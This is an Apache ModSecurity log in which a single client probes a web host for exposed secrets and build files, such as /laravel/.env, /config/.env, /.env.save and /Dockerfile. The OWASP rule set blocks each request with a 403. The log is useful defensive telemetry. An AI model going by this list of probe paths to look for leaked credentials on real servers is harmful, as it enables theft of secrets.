[Sat Mar 21 04:07:51.766700 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab4Lh7VOPlV6sIlrZCplLQAAAAA"]
[Sat Mar 21 04:07:52.080209 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplLgAAAAA"]
[Sat Mar 21 04:07:52.080913 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplLgAAAAA"]
[Sat Mar 21 04:07:52.081085 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplLgAAAAA"]
[Sat Mar 21 04:07:52.681359 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplMAAAAAA"]
[Sat Mar 21 04:07:52.681523 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplMAAAAAA"]
[Sat Mar 21 04:07:52.681682 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplMAAAAAA"]
[Sat Mar 21 04:07:52.978924 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplMQAAAAA"]
[Sat Mar 21 04:07:52.979097 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplMQAAAAA"]
[Sat Mar 21 04:07:52.979272 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab4LiLVOPlV6sIlrZCplMQAAAAA"]
[Sat Mar 21 04:07:53.273673 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "ab4LibVOPlV6sIlrZCplMgAAAAA"]
[Sat Mar 21 04:07:53.273828 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "ab4LibVOPlV6sIlrZCplMgAAAAA"]
[Sat Mar 21 04:07:53.273987 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "ab4LibVOPlV6sIlrZCplMgAAAAA"]
[Sat Mar 21 04:07:53.617856 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "ab4LibVOPlV6sIlrZCplMwAAAAA"]
[Sat Mar 21 04:07:53.618012 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "ab4LibVOPlV6sIlrZCplMwAAAAA"]
[Sat Mar 21 04:07:53.618166 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "ab4LibVOPlV6sIlrZCplMwAAAAA"]
[Sat Mar 21 04:07:53.917428 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "ab4LibVOPlV6sIlrZCplNAAAAAA"]
[Sat Mar 21 04:07:53.917586 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "ab4LibVOPlV6sIlrZCplNAAAAAA"]
[Sat Mar 21 04:07:53.917730 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "ab4LibVOPlV6sIlrZCplNAAAAAA"]
[Sat Mar 21 04:07:54.223189 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNQAAAAA"]
[Sat Mar 21 04:07:54.223408 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNQAAAAA"]
[Sat Mar 21 04:07:54.223615 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNQAAAAA"]
[Sat Mar 21 04:07:54.517812 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNgAAAAA"]
[Sat Mar 21 04:07:54.517985 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNgAAAAA"]
[Sat Mar 21 04:07:54.518162 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNgAAAAA"]
[Sat Mar 21 04:07:54.829851 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNwAAAAA"]
[Sat Mar 21 04:07:54.830008 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNwAAAAA"]
[Sat Mar 21 04:07:54.830174 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "ab4LirVOPlV6sIlrZCplNwAAAAA"]
[Sat Mar 21 04:07:55.143785 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "ab4Li7VOPlV6sIlrZCplOAAAAAA"]
[Sat Mar 21 04:07:55.143964 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "ab4Li7VOPlV6sIlrZCplOAAAAAA"]
[Sat Mar 21 04:07:55.144123 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "ab4Li7VOPlV6sIlrZCplOAAAAAA"]
[Sat Mar 21 04:07:55.438629 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab4Li7VOPlV6sIlrZCplOQAAAAA"]
[Sat Mar 21 04:07:55.438787 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab4Li7VOPlV6sIlrZCplOQAAAAA"]
[Sat Mar 21 04:07:55.438936 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab4Li7VOPlV6sIlrZCplOQAAAAA"]
[Sat Mar 21 04:07:55.733079 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab4Li7VOPlV6sIlrZCplOgAAAAA"]
[Sat Mar 21 04:07:55.733246 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab4Li7VOPlV6sIlrZCplOgAAAAA"]
[Sat Mar 21 04:07:55.733431 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab4Li7VOPlV6sIlrZCplOgAAAAA"]
[Sat Mar 21 04:07:56.027633 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplOwAAAAA"]
[Sat Mar 21 04:07:56.027791 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplOwAAAAA"]
[Sat Mar 21 04:07:56.027958 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "ab4LjLVOPlV6sIlrZCplOwAAAAA"]
